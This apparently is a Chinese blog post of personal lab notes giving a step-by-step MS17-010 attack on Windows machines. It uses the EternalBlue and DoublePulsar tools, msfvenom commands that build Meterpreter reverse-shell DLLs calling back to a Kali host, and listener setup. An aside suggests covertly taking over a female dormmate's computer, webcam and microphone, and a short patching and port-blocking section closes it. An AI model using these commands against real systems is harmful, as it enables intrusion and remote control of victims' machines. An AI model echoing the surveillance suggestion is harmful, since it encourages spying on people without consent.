聲明:僅供學(xué)習(xí)交流使用,個(gè)人實(shí)驗(yàn)筆記。排版比較懶。
微軟MS17-010
理論:SMBv1 漏洞攻擊,445端口。
環(huán)境準(zhǔn)備:
攻擊資源:攻擊工具包 點(diǎn)我
攻擊者系統(tǒng):Windows 7 Ultimate (x64) 點(diǎn)我
受害者系統(tǒng):Windows 7 Ultimate (x64) 點(diǎn)我,winXP,win2008,win2003均可。 點(diǎn)我
輔助攻擊用系統(tǒng):kali 點(diǎn)我
推薦虛擬環(huán)境構(gòu)建工具:vmware workstation或oracle Vbox工具下載
操作:
1、攻擊者環(huán)境部署(確保路徑全英文):
虛擬機(jī)部署win7 64位環(huán)境,要么都橋接,要么都選擇自定義網(wǎng)絡(luò)。
下載python2.6并安裝點(diǎn)我
下載pywin32并安裝,一定要注意,下載對(duì)應(yīng)python版本點(diǎn)我
將C:\Python26添加到環(huán)境變量PATH中。
將攻擊工具包拖入虛擬機(jī),或上傳到虛擬機(jī)。解壓后,里面有個(gè)Windows的目錄,復(fù)制出來(lái)到虛擬機(jī)的c盤(pán)。
新建 listeningposts 目錄。
2、受害者環(huán)境部署:
受害者系統(tǒng)自選一個(gè)就行,隨意,安裝后,需要和攻擊者系統(tǒng)能互相ping通。
3、攻擊操作:
攻擊者在cmd下運(yùn)行fb.py
target IP就是受害者IP
callbackIP就是攻擊者的IP
USE redirection輸入NO
base log 輸入 c:\logs或輸入NO(是否有日志記錄,這個(gè)是自愿)
接著輸入0,新建了一個(gè)攻擊項(xiàng)目。
項(xiàng)目名稱(chēng)隨意(英文以外名字可能會(huì)報(bào)錯(cuò))。
然后輸入yes確認(rèn)
其他的直接回車(chē)就行了。英文可以用有道翻譯。
use EternalBlue
問(wèn)你是否要setting。輸入yes
下面的回車(chē)就好,都是默認(rèn)好的配置。
target system,如實(shí)選擇受害者的系統(tǒng)。
mode選擇fb,即輸入1。
剩下的就是yes和回車(chē)了。
當(dāng)出現(xiàn)success關(guān)鍵詞的時(shí)候,說(shuō)明攻擊第一步已經(jīng)完成了。
(失敗的原因:
1、防火墻的保護(hù)。
2、殺毒程序的保護(hù)。
3、網(wǎng)絡(luò)通信異常。
4、人為操作失誤。)
部署輔助攻擊系統(tǒng):
1、部署kali,可以和攻擊者正常通信即可。
2、攻擊者安裝xshell。
3、通過(guò)xshell ssh到kali即可。(百度關(guān)鍵詞,kali開(kāi)啟和配置ssh服務(wù))
4、利用kali 的msf生成后門(mén)文件。(LPORT端口參數(shù)隨意,只要不沖突就行)
如果受害者是winXP 32位:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali系統(tǒng)的ip LPORT=19999 -f dll > /tmp/attack.dll
如果受害者是win7 64位:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=kali的ip LPORT=5555 -f dll > /tmp/attack.dll
確認(rèn)xshell已經(jīng)連接到了kali,
在xshell輸入:sz /opt/attack.dll
選擇保存在攻擊者系統(tǒng)的c盤(pán)根目錄下即可。
xshell下:
msfconsole
use exploit/multi/handler //啟用了監(jiān)聽(tīng)模塊
受害者是winXP的時(shí)候:
( set payload windows/meterpreter/reverse_tcp
set LHOST kali的ip
set LPORT 19999
show options //看一眼配置
run //開(kāi)啟了監(jiān)聽(tīng)
)
受害者是win7 64位時(shí):
(
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost kali的ip
msf exploit(handler) > set lport 5555
msf exploit(handler) > exploit
)
在攻擊者的cmd下:
use Doublepulsar
操作系統(tǒng)選擇目標(biāo)的。
選擇RunDLL
路徑輸入:c:\attack.dll
其他各種回車(chē)確認(rèn)。
可以看到,xshell連接的kali,收到了會(huì)話(huà)連接。
可以輸入whoami或者dir來(lái)驗(yàn)證一下。
其他資源(感覺(jué)部署環(huán)境好麻煩,想來(lái)點(diǎn)現(xiàn)成的):
在線(xiàn)現(xiàn)成的環(huán)境操作實(shí)戰(zhàn):點(diǎn)我在線(xiàn)實(shí)戰(zhàn)
kali下直接實(shí)現(xiàn)攻擊利用:http://www.itdecent.cn/p/f770d0bbed77
雜談
一般情況,女生的電腦如果和你在一個(gè)網(wǎng)絡(luò),比如你們宿舍之間,沒(méi)有做嚴(yán)格的隔離,那么,理論上講,可以完整的控制她的電腦,除非她安裝了360,為何不說(shuō)她安裝了騰訊管家。因?yàn)?,?duì)付一些漏洞,需要足夠的浪才可以,管家還是太文縐縐了。
(不僅可以截屏,還可以看攝像頭,還有錄音。另:現(xiàn)網(wǎng)實(shí)戰(zhàn)前,請(qǐng)閱讀:https://www.ishuo.cn/doc/mzlpnnqf.html)
預(yù)防和其他參考:
360提供了懶人模式的NSA攻擊自動(dòng)檢測(cè)和防護(hù)工具,免安裝。點(diǎn)我
使用防火墻過(guò)濾/關(guān)閉 137、139、445端口。
對(duì)于 3389 遠(yuǎn)程登錄,如果不想關(guān)閉的話(huà),至少要關(guān)閉智能卡登錄功能。
安裝微軟補(bǔ)丁:請(qǐng)前往微軟官方網(wǎng)站下載與自己操作系統(tǒng)匹配的安全補(bǔ)丁進(jìn)行更新
MS08-067:https://technet.microsoft.com/zh-cn/library/security/ms08-067.aspx
MS09-050:https://technet.microsoft.com/library/security/ms09-050
MS10-061:https://technet.microsoft.com/zh-cn/library/security/ms10-061.aspx
MS14-068:https://technet.microsoft.com/library/security/MS14-068
MS17-010:https://technet.microsoft.com/zh-cn/library/security/MS17-010